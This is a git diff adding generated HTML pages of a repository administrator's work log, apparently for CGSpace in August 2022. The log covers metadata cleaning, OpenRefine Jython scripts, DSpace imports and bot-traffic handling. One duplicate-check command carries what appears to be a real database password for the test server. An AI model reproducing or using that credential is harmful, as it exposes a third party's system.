+<li>Then I extracted the titles, dates, and types and added IDs, then ran them through <code>check-duplicates.py</code> to find the existing items on CGSpace so I can add them as <code>dcterm.relation</code> links</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -l -c dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-08-03-Innovations-Cleaned.csv | sed <span style="color:#e6db74">&#39;1s/line_number/id/&#39;</span> &gt; /tmp/innovations-temp.csv
+</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/innovations-temp.csv -u dspacetest -db dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span> -o /tmp/ccafs-duplicates.csv
+</span></span></code></pre></div><ul>
+<li>There were about 115 with existing items on CGSpace</li>
+<li>Then I did some minor processing and checking of the duplicates file (for example, some titles appear more than once in both files), and joined with the other file (left join):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvjoin --left -c dc.title ~/Downloads/2022-08-03-Innovations-Cleaned.csv ~/Downloads/2022-08-03-Innovations-relations.csv &gt; /tmp/innovations-with-relations.csv
+</span></span></code></pre></div><ul>
+<li>Then I used SAFBuilder to create a SimpleItemArchive and import to DSpace Test:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;</span>
+</span></span><span style="display:flex;"><span>$ dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-08-03-innovations.map
+</span></span></code></pre></div><ul>
+<li>Meeting with Mohammed Salem about harmonizing MEL and CGSpace metadata fields
+<ul>
+<li>I still need to share our results and recommendations with Peter, Enrico, Sara, Svetlana, et al</li>
+</ul>
+</li>
+<li>I made some minor fixes to csv-metadata-quality while working on the MARLO CRP Innovations</li>
+</ul>
+<h2 id="2022-08-05">2022-08-05</h2>
+<ul>
+<li>I discussed issues with the DSpace 7 submission forms on Slack and Mark Wood found that the migration tool creates a non-working submission form
+<ul>
+<li>After updating the class name of the collection step and removing the &ldquo;complete&rdquo; and &ldquo;sample&rdquo; steps the submission form was working</li>
+<li>Now the issue is that the controlled vocabularies show up like this:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2022/08/dspace7-submission.png" alt="Controlled vocabulary bug in DSpace 7"></p>
+<ul>
+<li>I think we need to add IDs, I will have to check what the implications of that are
+<ul>
+<li>Note (2022-09-27): see this related change from DSpace 7.3: <a href="https://github.com/DSpace/DSpace/pull/8174">https://github.com/DSpace/DSpace/pull/8174</a></li>
+</ul>
+</li>
+<li>Emilio contacted me last week to say they have re-worked their harvester on Hetzner to use a new user agent: <code>AICCRA website harvester</code>
+<ul>
+<li>I verified that I see it in the REST API logs, but I don&rsquo;t see any new stats hits for it</li>
+<li>I do see 11,000 hits from that IP last month when I had the incorrect nginx configuration that was sending a literal <code>$http_user_agent</code> so I purged those</li>
+<li>It is lucky that we have <code>harvest</code> in the DSpace spider agent example file so Solr doesn&rsquo;t log these hits, nothing needed to be done in nginx</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-08-13">2022-08-13</h2>
+<ul>
+<li>I noticed there was high load on CGSpace, around 9 or 10
+<ul>
+<li>Looking at the Munin graphs it seems to just be the last two hours or so, with a slight increase in PostgreSQL connections, firewall traffic, and a more noticeable increase in CPU</li>
+<li>DSpace sessions are normal</li>
+<li>The number of unique hosts making requests to nginx is pretty low, though it&rsquo;s only 6AM in the server&rsquo;s time</li>
+</ul>
+</li>
+<li>I see one IP in Sweden making a lot of requests with a normal user agent: 80.248.237.167
+<ul>
+<li>This host is on Internet Vikings (INTERNETBOLAGET), and I see 140,000 requests from them in Solr</li>
+<li>I see reports of excessive scraping on AbuseIPDB.com</li>
+<li>I&rsquo;m gonna add their 80.248.224.0/20 to the bot-networks.conf in nginx</li>
+<li>I will also purge all the hits from this IP in Solr statistics</li>
+</ul>
+</li>
+<li>I also see the core.ac.uk bot making tens of thousands of requests today, but we are already tagging that as a bot in Tomcat&rsquo;s Crawler Session Manager valve, so they should be sharing a Tomcat session with other bots and not creating too many sessions</li>
+</ul>
+<h2 id="2022-08-15">2022-08-15</h2>
+<ul>
+<li>Start indexing on AReS</li>
+<li>Add CONSERVATION to ILRI subjects on CGSpace
+<ul>
+<li>I see that AGROVOC has <code>conservation agriculture</code> and I suggested that we use that instead</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-08-17">2022-08-17</h2>
+<ul>
+<li>Peter and Jose sent more feedback about the CRP Innovation records from MARLO
+<ul>
+<li>We expanded the CRP names in the citation and removed the <code>cg.identifier.url</code> URLs because they are ugly and will stop working eventually</li>
+<li>The mappings of MARLO links will be done internally with the <code>cg.number</code> IDs like &ldquo;IN-1119&rdquo; and the Handle URIs</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-08-18">2022-08-18</h2>
+<ul>
+<li>I talked to Jose about the CCAFS MARLO records
+<ul>
+<li>He still hasn&rsquo;t finished re-processing the PDFs to update the internal MARLO links</li>
+<li>I started looking at the other records (MELIAs, OICRs, Policies) and found some minor issues in the MELIAs so I sent feedback to Jose</li>
+<li>On second thought, I opened the MELIAs file in OpenRefine and it looks OK, so this must have been a parsing issue in LibreOffice when I was checking the file (or perhaps I didn&rsquo;t use the correct quoting when importing)</li>
+</ul>
+</li>
+<li>Import the original MELIA v2 CSV file into OpenRefine to fix encoding before processing with csvcut/csvjoin
+<ul>
+<li>Then extract the IDs and filenames from the original V2 file and join with the UTF-8 file:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;cg.number (series/report No.)&#39;</span>,File ~/Downloads/MELIA-Metadata-v2-csv.csv &gt; MELIA-v2-IDs-Files.csv
+</span></span><span style="display:flex;"><span>$ csvjoin -c <span style="color:#e6db74">&#39;cg.number (series/report No.)&#39;</span> MELIAs<span style="color:#ae81ff">\ </span>metadata<span style="color:#ae81ff">\ </span>utf8<span style="color:#ae81ff">\ </span>20220816_JM.csv MELIA-v2-IDs-Files.csv &gt; MELIAs-UTF-8-with-files.csv
+</span></span></code></pre></div><ul>
+<li>Then I imported them into OpenRefine to start metadata cleaning and enrichment</li>
+<li>Make some minor changes to <a href="https://github.com/ilri/cgspace-submission-guidelines">cgspace-submission-guidelines</a>
+<ul>
+<li>Upgrade to Bootstrap v5.2.0</li>
+<li>Dedupe value pairs and controlled vocabularies before writing them</li>
+<li>Sort the controlled vocabularies before writing them (we don&rsquo;t do this for value pairs because some are added in specific order, like CRPs)</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-08-19">2022-08-19</h2>
+<ul>
+<li>Peter Ballantyne sent me metadata for 311 Gender items that need to be duplicate checked on CGSpace before uploading
+<ul>
+<li>I spent a half an hour in OpenRefine to fix the dates because they only had YYYY, but most abstracts and titles had more specific information about the date</li>
+<li>Then I checked for duplicates:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i ~/Downloads/gender-ppts-xlsx.csv -u dspace -db dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/gender-duplicates.csv
+</span></span></code></pre></div><ul>
+<li>I sent the list of ~130 possible duplicates to Peter to check</li>
+<li>Jose sent new versions of the MARLO Innovation/MELIA/OICR/Policy PDFs
+<ul>
+<li>The idea was to replace tinyurl links pointing to MARLO, but I still see many tinyurl links, some of which point to CGIAR Sharepoint and require a login</li>
+<li>I asked them why they don&rsquo;t just use the original links in the first place in case tinyurl.com disappears</li>
+</ul>
+</li>
+<li>I continued working on the MARLO MELIA v2 UTF-8 metadata
+<ul>
+<li>I did the same metadata enrichment exercise to extract countries and AGROVOC subjects from the abstract field that I did earlier this month, using a Jython expression to match terms in copies of the abstract field</li>
+<li>It helps to replace some characters with spaces first with this GREL: <code>value.replace(/[.\/;(),]/, &quot; &quot;)</code></li>
+<li>This caught some extra AGROVOC terms, but unfortunately we only check for single-word terms</li>
+<li>Then I checked for existing items on CGSpace matching these MELIA using my duplicate checker:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i ~/Downloads/2022-08-18-MELIAs-UTF-8-With-Files.csv -u dspace -db dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/melia-matches.csv
+</span></span></code></pre></div><ul>
+<li>Then I did some minor processing and checking of the duplicates file (for example, some titles appear more than once in both files), and joined with the other file (left join):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ xsv join --left id ~/Downloads/2022-08-18-MELIAs-UTF-8-With-Files.csv id ~/Downloads/melia-matches-csv.csv &gt; /tmp/melias-with-relations.csv
+</span></span></code></pre></div><ul>
+<li>I had to use <code>xsv</code> because <code>csvcut</code> was throwing an error detecting the dialect of the input CSVs (?)</li>
+<li>I created a SAF bundle and imported the 749 MELIAs to DSpace Test</li>
+<li>I found thirteen items on CGSpace with dates in format &ldquo;DD/MM/YYYY&rdquo; so I fixed those</li>
+</ul>
+<h2 id="2022-08-20">2022-08-20</h2>
+<ul>
+<li>Peter sent me back the results of the duplicate checking on the Gender presentations
+<ul>
+<li>There were only a handful of duplicates, so I used the IDs in the spreadsheet to flag and delete them in OpenRefine</li>
+</ul>
+</li>
+<li>I had a new idea about matching AGROVOC subjects and countries in OpenRefine
+<ul>
+<li>I was previously splitting up the text value field (title/abstract/etc) by spaces and searching for each word in the list of terms/countries like this:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>with open(r&#34;/tmp/cgspace-countries.txt&#34;,&#39;r&#39;) as f:
+</span></span><span style="display:flex;"><span>    countries = [name.rstrip().lower() for name in f]
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>return &#34;||&#34;.join([x for x in value.split(&#39; &#39;) if x.lower() in countries])
+</span></span></code></pre></div><ul>
+<li>But that misses multi-word terms/countries with spaces, so we can search the other way around by using a regex for each term/country and checking if it appears in the text value field:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>import re
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>with open(r&#34;/tmp/agrovoc-subjects.txt&#34;,&#39;r&#39;) as f:
+</span></span><span style="display:flex;"><span>    terms = [name.rstrip().lower() for name in f]
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>return &#34;||&#34;.join([term for term in terms if re.match(r&#34;.*\b&#34; + term + r&#34;\b.*&#34;, value.lower())])
+</span></span></code></pre></div><ul>
+<li>Now we are only limited by our small (~1,400) list of AGROVOC subjects, so I did an export from PostgreSQL of all <code>dcterms.subjects</code> values and am looking them up against AGROVOC&rsquo;s API right now:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value AS &#34;dcterms.subject&#34;, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY &#34;dcterms.subject&#34; ORDER BY count DESC) to /tmp/2022-08-20-agrovoc.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 21685
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2022-08-20-agrovoc.csv | sed 1d &gt; /tmp/all-subjects.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/agrovoc-lookup.py -i /tmp/all-subjects.txt -o 2022-08-20-all-subjects-results.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#39;number of matches&#39;</span> -m <span style="color:#ae81ff">0</span> -i /tmp/2022-08-20-all-subjects-results.csv.bak | csvcut -c <span style="color:#ae81ff">1</span> | sed 1d &gt; /tmp/agrovoc-subjects.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/agrovoc-subjects.txt
+</span></span><span style="display:flex;"><span>11834 /tmp/agrovoc-subjects.txt
+</span></span></code></pre></div><ul>
+<li>Then I created a new column joining the title and abstract, and ran the Jython expression above against this new file with 11,000 AGROVOC terms
+<ul>
+<li>Then I joined that column with Peter&rsquo;s <code>dcterms.subject</code> column and then deduplicated it with this Jython:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>res = []
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>[res.append(x) for x in value.split(&#34;||&#34;) if x not in res]
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>return &#34;||&#34;.join(res)
+</span></span></code></pre></div><ul>
+<li>This is way better, but you end up getting a bunch of countries, regions, and short words like &ldquo;gates&rdquo; matching in AGROVOC that are inappropriate (we typically don&rsquo;t tag these in AGROVOC) or incorrect (gates, as in windows or doors, not the funding agency)
+<ul>
+<li>I did a text facet in OpenRefine and removed a bunch of these by eye</li>
+</ul>
+</li>
+<li>Then I finished adding the <code>dcterms.relation</code> and CRP metadata flagged by Peter on the Gender presentations
+<ul>
+<li>I&rsquo;m waiting for him to send me the PDFs and then I will upload them to DSpace Test</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-08-21">2022-08-21</h2>
+<ul>
+<li>Start indexing on AReS</li>
+<li>The load on CGSpace was around 5.0 today, and now that I started the harvesting it&rsquo;s over 10 for an hour now, sigh&hellip;
+<ul>
+<li>I&rsquo;m going to try an experiment to block Googlebot, bingbot, and Yandex for a week to see if the load goes down</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-08-22">2022-08-22</h2>
+<ul>
+<li>I tried to re-generate the SAF bundle for the MARLO Innovations after improving the AGROVOC subjects and the v3 PDFs, but six are missing from the v3 zip that are present in the original zip:
+<ul>
+<li>ProjectInnovationSummary-WLE-P500-I78.pdf</li>
+<li>ProjectInnovationSummary-WLE-P452-I699.pdf</li>
+<li>ProjectInnovationSummary-WLE-P518-I696.pdf</li>
+<li>ProjectInnovationSummary-WLE-P442-I740.pdf</li>
+<li>ProjectInnovationSummary-WLE-P516-I647.pdf</li>
+<li>ProjectInnovationSummary-WLE-P438-I585.pdf</li>
+</ul>
+</li>
+<li>I downloaded them manually using the URLs in the original CSV</li>
+<li>I also uploaded a new version of the MELIAs to DSpace Test</li>
+</ul>
+<h2 id="2022-08-23">2022-08-23</h2>
+<ul>
+<li>Checking the number of items on CGSpace so we can keep an eye on the 100,000 number:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# SELECT COUNT(uuid) FROM item WHERE in_archive=&#39;t&#39;;
+</span></span><span style="display:flex;"><span> count 
+</span></span><span style="display:flex;"><span>-------
+</span></span><span style="display:flex;"><span> 95716
+</span></span><span style="display:flex;"><span>(1 row)
+</span></span></code></pre></div><ul>
+<li>If I check OAI I see more, but perhaps that counts mapped items multiple times</li>
+<li>Peter said the 303 Gender PPTs were good to go, so I updated the collection mappings and IDs in OpenRefine and then uploaded them to CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace import --add --eperson<span style="color:#f92672">=</span>fuu@fuu.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-08-23-gender-ppts.map
+</span></span></code></pre></div><ul>
+<li>I created a <a href="https://github.com/ilri/OpenRXV/issues/133">GitHub issue for OpenRXV compatibility issues with DSpace 7</a></li>
+</ul>
+<h2 id="2022-08-24">2022-08-24</h2>
+<ul>
+<li>Start working on the MARLO OICRs
+<ul>
+<li>First I extracted the filenames and IDs from the v2 metadata file, then joined it with the UTF-8 version:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ xsv <span style="color:#66d9ef">select</span> <span style="color:#e6db74">&#39;cg.number (series/report No.),File&#39;</span> OICRS<span style="color:#ae81ff">\ </span>Metadata<span style="color:#ae81ff">\ </span>v2.csv &gt; /tmp/OICR-files.csv
+</span></span><span style="display:flex;"><span>$ xsv join --left <span style="color:#e6db74">&#39;cg.number (series/report No.)&#39;</span> OICRS<span style="color:#ae81ff">\ </span>metadata<span style="color:#ae81ff">\ </span>utf8<span style="color:#ae81ff">\ </span>20220816_JM.csv <span style="color:#e6db74">&#39;cg.number (series/report No.)&#39;</span> /tmp/OICR-files.csv &gt; OICRs-UTF-8-with-files.csv
+</span></span></code></pre></div><ul>
+<li>After that I imported it into OpenRefine for data cleaning
+<ul>
+<li>To enrich the metadata I combined the title and abstract into a new field and then checked my list of 11,000 AGROVOC terms against it</li>
+<li>First, create a new column with this GREL:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>cells[&#34;dc.title&#34;].value + &#34; &#34; + cells[&#34;dcterms.abstract&#34;].value
+</span></span></code></pre></div><ul>
+<li>Then use this Jython:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> re
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">with</span> open(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;/tmp/agrovoc-subjects.txt&#34;</span>,<span style="color:#e6db74">&#39;r&#39;</span>) <span style="color:#66d9ef">as</span> f : 
+</span></span><span style="display:flex;"><span>    terms <span style="color:#f92672">=</span> [name<span style="color:#f92672">.</span>rstrip()<span style="color:#f92672">.</span>lower() <span style="color:#66d9ef">for</span> name <span style="color:#f92672">in</span> f]
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">return</span> <span style="color:#e6db74">&#34;||&#34;</span><span style="color:#f92672">.</span>join([term <span style="color:#66d9ef">for</span> term <span style="color:#f92672">in</span> terms <span style="color:#66d9ef">if</span> re<span style="color:#f92672">.</span><span style="color:#66d9ef">match</span>(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;.*\b&#34;</span> <span style="color:#f92672">+</span> term <span style="color:#f92672">+</span> <span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;\b.*&#34;</span>, value<span style="color:#f92672">.</span>lower())])
+</span></span></code></pre></div><ul>
+<li>After that I de-duplicated the terms using this Jython:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>res <span style="color:#f92672">=</span> []
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span>[res<span style="color:#f92672">.</span>append(x) <span style="color:#66d9ef">for</span> x <span style="color:#f92672">in</span> value<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#34;||&#34;</span>) <span style="color:#66d9ef">if</span> x <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> res]
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">return</span> <span style="color:#e6db74">&#34;||&#34;</span><span style="color:#f92672">.</span>join(res)
+</span></span></code></pre></div><ul>
+<li>Then I split the multi-values on &ldquo;||&rdquo; and used a text facet to remove some countries and other nonsense terms that matched, like &ldquo;gates&rdquo; and &ldquo;al&rdquo; and &ldquo;s&rdquo;
+<ul>
+<li>Then I did the same for countries</li>
+</ul>
+</li>
+<li>Then I exported the CSV and started searching for duplicates so that I can add them as relations:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i ~/Downloads/2022-08-24-OICRs.csv -u dspace -db dspace -p <span style="color:#e6db74">&#39;omg&#39;</span> -o /tmp/oicrs-matches.csv
+</span></span></code></pre></div><ul>
+<li>Oh wow, I actually found one OICR already uploaded to CGSpace&hellip; I have to ask Jose about that</li>
+</ul>
+<h2 id="2022-08-25">2022-08-25</h2>
+<ul>
+<li>I started processing the MARLO Policies in OpenRefine, similar to the Innovations, MELIAs, and OICRs above
+<ul>
+<li>I also re-ran the AGROVOC matching on Innovations because my technique has improved since I ran it a few weeks ago</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-08-29">2022-08-29</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+<li>Meeting with Peter and Abenet about CGSpace issues</li>
+<li>I mapped the one MARLO OICR duplicate from the CCAFS Reports collection and deleted it from the OICRs CSV</li>
+</ul>
+<h2 id="2022-08-30">2022-08-30</h2>
+<ul>
+<li>Manuel from the &ldquo;Alianza SIDALC&rdquo; in South America contacted me asking for permission to harvest CGSpace and include our content in their system
+<ul>
+<li>I responded that we would be glad if they harvested us, and that they should use a useful user agent so we can contact them incase of any issues or changes on the server</li>
+</ul>
+</li>
+<li>I emailed ILRI ICT to ask how Abenet and I can use the CGSpace Support email address in our email applications because we haven&rsquo;t checked that account in years
+<ul>
+<li>I tried to log in on office365.com but it gave an error</li>
+<li>I got access to the account and cleaned up the inbox, unsubscribed from a bunch of Microsoft and Yammer feeds, etc</li>
+</ul>
+</li>
+<li>Remind Dani, Tariku, and Andrea about the legacy links that we want to update on ILRI&rsquo;s website:
+<ul>
+<li><a href="http://mahider.ilri.org">http://mahider.ilri.org</a> → <a href="https://cgspace.cgiar.org">https://cgspace.cgiar.org</a></li>
+<li><a href="http://mahider.ilri.org/handle/10568/xxxxx">http://mahider.ilri.org/handle/10568/xxxxx</a> → <a href="https://hdl.handle.net/10568/xxxxx">https://hdl.handle.net/10568/xxxxx</a></li>
+<li><a href="http://www.ilri.org/ilrinews/index.php/archives/xxxx">http://www.ilri.org/ilrinews/index.php/archives/xxxx</a> → <a href="https://newsarchive.ilri.org/archives/xxxx">https://newsarchive.ilri.org/archives/xxxx</a></li>
+</ul>
+</li>
+<li>Join the MARLO OICRs with their relations that I processed a few days ago (minus the second id column and some others):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ xsv join --left id ~/Downloads/2022-08-24-OICRs.csv id ~/Downloads/oicrs-matches-csv.csv | xsv <span style="color:#66d9ef">select</span> <span style="color:#e6db74">&#39;!id[1],Your Title,Their Title,Similarity,Your Date,Their Date,datediff&#39;</span> &gt; /tmp/oicrs-with-relations.csv
+</span></span></code></pre></div><ul>
+<li>Then I cleaned them with csv-metadata-quality to catch some duplicates, add regions, etc and re-imported to OpenRefine
+<ul>
+<li>I flagged a few duplicates for Jose and he&rsquo;ll let me know what to do with them</li>
+</ul>
+</li>
+<li>I imported the OICRs to DSpace Test:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;</span>
+</span></span><span style="display:flex;"><span>$ dspace import --add --eperson<span style="color:#f92672">=</span>fuuuu@fuuu.com --source /tmp/SimpleArchiveFormat-oicrs --mapfile<span style="color:#f92672">=</span>./2022-08-30-OICRs.map
+</span></span></code></pre></div><ul>
+<li>Meeting with Marie-Angelique, Abenet, Valentina, Sara, and Margarita about Types</li>
+<li>I am testing the <code>org.apache.cocoon.uploads.autosave=false</code> setting for XMLUI so that files posted via multi-part forms get memory mapped instead of written to disk</li>
+<li>Check the MARLO Policies for relations and join them with the main CSV file:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i ~/Downloads/2022-08-25-Policies-UTF-8-With-Files.csv -u dspace -db dspace -p <span style="color:#e6db74">&#39;fuui&#39;</span> -o /tmp/policies-matches.csv
+</span></span><span style="display:flex;"><span>$ xsv join --left id ~/Downloads/2022-08-25-Policies-UTF-8-With-Files.csv id /tmp/policies-matches.csv | xsv <span style="color:#66d9ef">select</span> <span style="color:#e6db74">&#39;!id[1],Your Title,Their Title,Similarity,Your Date,Their Date&#39;</span> &gt; /tmp/policies-with-relations.csv
+</span></span></code></pre></div><!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2022-09/index.html b/docs/2022-09/index.html
new file mode 100644
index 000000000..14b1240db
--- /dev/null
+++ b/docs/2022-09/index.html
@@ -0,0 +1,837 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="September, 2022" />
+<meta property="og:description" content="2022-09-01
+
+A bit of work on the &ldquo;Mapping CG Core–CGSpace–MEL–MARLO Types&rdquo; spreadsheet
+I tested an item submission on DSpace Test with the Cocoon org.apache.cocoon.uploads.autosave=false change
+
+The submission works as expected
+
+
+Start debugging some region-related issues with csv-metadata-quality
+
+I created a new test file test-geography.csv with some different scenarios
+I also fixed a few bugs and improved the region-matching logic
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-09/" />
+<meta property="article:published_time" content="2022-09-01T09:41:36+03:00" />
+<meta property="article:modified_time" content="2022-09-30T17:29:50+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="September, 2022"/>
+<meta name="twitter:description" content="2022-09-01
+
